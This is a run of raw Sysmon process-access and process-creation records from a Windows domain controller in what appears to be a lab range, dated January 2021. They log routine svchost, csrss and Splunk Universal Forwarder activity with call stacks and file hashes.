13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E9B-6005-8C00-00000000A301}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9B-6005-8C00-00000000A301}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.622{59A5CD1D-8E9B-6005-8C00-00000000A301}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9C-6005-8D00-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E9C-6005-8D00-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9C-6005-8D00-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E9C-6005-8D00-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.358{59A5CD1D-8E9E-6005-8E00-00000000A301}47764772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9E-6005-8E00-00000000A301}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 